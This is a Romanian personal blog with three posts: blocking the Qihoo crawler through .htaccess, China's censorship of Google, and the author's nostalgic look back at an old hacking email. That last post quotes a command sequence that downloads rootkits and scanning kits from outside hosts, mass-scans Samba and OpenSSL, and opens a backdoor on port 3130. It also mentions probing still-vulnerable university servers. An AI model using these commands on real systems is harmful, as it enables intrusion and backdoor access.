Qihoo !

Interesant titlul , nu ? :) . Interesant probabil pentru cei care administreaza un site sau un server de webhosting ( in special webhosting) .

Qihoo este un motor de cautare folosit in China , oarecum sinonim cu Yahoo! Search care afiseaza rezultate in limba chineza , probabil bine selectate . Tehnologia de care dispune China in domeniul IT cred ca este putin cam rapida pentru unele servere webhosting. Un bot qihoo citeste pe un site aproximativ 480 de pagini intr-un minut si genereaza un trafic putin cam mare pentru un pachet de webhosting modest. Botul asta cred ca are si o problema de orientare :) . Nu prea nimereste pagini reale in site, majoritatea hiturilor fiind de tip 404  (Document Not Found). “Prosti, dar multi !!!” .

De cateva zile sunt bantuit pe un site de un astfel de zombie care stie destul de bine sa-si faca simtita prezenta. Pana in data de 12 Apr 2007 , traficul (Bandwidth) pe site-ul “victima” nu depasea mai mult de 59 - 60 MB / zi .  Dupa data de 13 aprilie ( ce zi cu noroc …) traficul a ajuns la peste 500 MB/zi , ajungand pe 19 aprilie la 714.79 MB.

O statistica din server :

IP qihoo : 220.181.34.185

Pages : 159965

Hits : 159965

Bandwidth : 4.38 GB

Last visit : 24 Apr 2007 - 09:48

Bun . Daca bot-ul asta in ~ 12 zile a reusit sa-mi faca de unu singur aproape 4.5 GB trafic , asta ar insemna ca pentru cineva care foloseste un pachet de webhosting romanesc devine o adevarata “afacere” . Omul trebuie sa scoata din buzunar cel putin 10 euro / luna pentru webhosting doar ca sa plateasca traficul facut de qihoo . De exemplu aici : blue-host.ro/ pachetul de 10 EURO/luna include 10GB trafic. Nu cred ca-si doreste nimeni sa plateasca atatia bani pentru a fi indexat de un motor de cautare al Chinei .

Bun. Eu am scapat de vizita unui astel de bot SEO si nu am mizat deloc pe capacitatea lui de citire a fisierului robots.txt . Nu sunt interesat sa am site-urile listate/indexate intr-un motor de cautare chinezesc. E posibil ca botul sa nu inteleaga fisierul de SEO al unui site si am ales o alta metoda prin care sa-i explic mai clar ce are de facut . :D Rescrierea fisierului .htaccess din webroot in vederea blocarii accesului :

order allow,deny
deny from 220.181.34.185
allow from all

Apache / Deny directive

Syntax: Deny from all|host|env=env-variable [host|env=env-variable] …
Context: directory, .htaccess
Override: Limit
Status: Base
Module: mod_access

This directive allows access to the server to be restricted based on hostname, IP address, or environment variables. The arguments for the Deny directive are identical to the arguments for the Allow directive.

Adio , qihoo.com !

China sa fi luat oare decizia de a elimina in totalitate autocenzuratul Google de pe piata lor ? Scriu asta pentru ca mi-am adus aminte de niste discutii care aparusera prin presa acum ceva timp .

Un articol scris in Ziarul Financiar pe 26 ianuarie 2006 :

Daca acum cateva zile, Google tinea prima pagina a ziarelor pentru ca s-a opus guvernului american pentru a-si proteja utilizatorii, acum Google se conformeaza guvernului chinez si isi cenzureaza pagina de Internet. Dar lucrurile nu sunt cum par la prima vedere. Utilizatorii de Internet din China care vor incerca sa acceseze pagina www.google.com vor fi redirectionati automat catre pagina cenzurata de catre cei de la Google.

Cenzura site-ului va fi asigurata de echipa Google din China in colaborare cu autoritatile chineze. Cum mecanismul sistemul de cenzura al guvernului chinez nu este public, nu exista o lista a ce anume va fi cenzurat.

E-mail - reminder

O noua zi de luni, un nou inceput de saptamana care nu anunta nimic spectaculos deocamdata. M-am trezit destul de tarziu si ca de obicei, imi deschid pc-ul si citesc mail-urile in compania unei cafele :-) . Nimic interesant in inbox. Mi-am aruncat privirea la spatiul ocupat pe yahoo si am fost putin surprins … 22% of 1GB. Multe mail-uri pastrate prin foldere care nu au fost deschise decat odata si asta in urma cu mult timp.

Am facut putina ordine (care a durat mai bine de o ora), si am surpriza sa gasesc niste mail-uri salvate de mine de pe niste adrese mai vechi. Mergand din aproape in aproape si incercand minute bune sa-mi aduc aminte parolele de la vechile casute de e-mail (ce mai mare prostie sa-ti schimbi o adresa de e-mail), am vazut un mail cu subiectul ROOT ! DOAMNEEEE ! ce minte aveam acum cativa ani si ce era de capul meu ! Hacker nu gluma ! :-)
Extras dintr-un mail:

To: rootXXX@yahoo.com, XXXX@i-cs.ro, XXX@yahoo.com
Subject: #root
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Content-Length: 1380
tar vf smb.tar.gz
cd smb
./start Clasa
wget www.awayms.as.ro/rewt.tgz
wget geocities.com/alinsimadi/china.tar.gz
wget www.linuxm.as.ro/x1.tgz | tar zxvf x1.tgz |
cd atd | ./mass -s 800
dupa ce prinzi ./osslmass2 mass.log
scan.tgz | cd new | ./scan ip ( samba)
wget www.linuxm.as.ro/bind.tgz | tar zxvf
bind.tgz | ./b2 | bind pentru
apache port telnet 3130
wget www.linuxm.as.ro/rk.tar.gz | tar zxvf
[....]

Sper sa nu le mai foloseasca nimeni in ziua de azi, mai ales ca scopul lor era cat se poate de “war” si consecintele “dureroase” atat pentru instituriile care au fost sparte cat si pentru pentru “atacator” daca este prins. NU se merita sa spargi un server pentru o tampenie de psyBNC (mIRC) sau pentru simpla “pasiune”.
Din simpla curiozitate totusi am vrut sa verific ceva. Am gasit cateva dns-uri care au fost sparte si constat ca nici astazi institutii din US nu sunt securizate si pot pica prada in orice moment unui copil dintr-o sala de net. Chiar nu inteleg…Universatile din Chicago (Loyola si UCLA), chiar nu au bani de investit in securitate, nu au resurse umane capabile sa securizeze un linux sau nu sunt interesati?
En fine … bine ca mi-am gasit alte preocupari. Adio I24 !